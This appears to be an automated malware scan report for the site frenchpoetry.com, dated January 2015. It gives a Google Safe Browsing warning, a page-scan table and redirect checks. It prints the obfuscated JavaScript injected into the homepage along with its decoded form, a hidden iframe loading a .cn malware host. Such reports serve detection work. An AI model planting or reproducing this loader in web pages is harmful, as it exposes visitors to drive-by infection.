Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frenchpoetry.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://frenchpoetry.com/ | 200 OK Content-Length: 9568 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var fzFirW33B0Xew7ZVj7W5eMCKJ='';var Kkm4fHfQdP4vi7XHFoDi7Wgxai2='vfgao%g2u%0r2v P%/rat2%%%e0%z0%02-f322r1r%%r2rpNbb2v1gQoqPn%e2cb/p%%t2ze/s %Qgtp.jQ02n%3e%seuyva0%232Q330n3/j.Sq3v2e2R%Nz2%t/%u2u%b2%RQ3%3rgv22%2s32%0';var BKqBNqF8sFniNybCl='591064783242063975182650489317534861209703975182466541982730214965370817548036929650274831638452097160915423873042965871290867153404531296872139856740';var jILqrDzQ1='';for(var vDm=0;vDm<15;vDm++) for(var QCldAp64S5=0;QCldAp64S5<10;QCldAp64S5++) { jILqrDzQ1=Kkm4fHfQdP4vi7XHFoDi7Wgxai2.charCodeAt((parseInt(BKqBNqF8sFniNybCl.charAt(vDm*10+QCldAp64S5))*15)+vDm); if ((jILqrDzQ1>=65 && jILqrDzQ1<78) || (jILqrDzQ1>=97 && jILqrDzQ1<110)) jILqrDzQ1+=13; else if ((jILqrDzQ1>=78 && jILqrDzQ1<91) || (jILqrDzQ1>=110 && jILqrDzQ1<123)) jILqrDzQ1-=13;fzFirW33B0Xew7ZVj7W5eMCKJ+=String.fromCharCode(jILqrDzQ1);}document.write(unescape(fzFirW33B0Xew7ZVj7W5eMCKJ)); Decoded script: <iframe src="http://google-newbot.cn/s/in.cgi?2" width="1" height="1" frameborder="0"></iframe> Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19468 Content-Type: text/javascript | clean |
http://frenchpoetry.com/ http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
http://frenchpoetry.com/ http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http:// http://frenchpoetry.com | 404 Not Found Content-Length: 6098 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frenchpoetry.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 09:12:26 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://frenchpoetry.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: frenchpoetry.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 09:12:26 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://frenchpoetry.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: frenchpoetry.com
Referer: http://www.google.com/search?q=frenchpoetry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frenchpoetry.com
Referer: http://www.google.com/search?q=frenchpoetry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.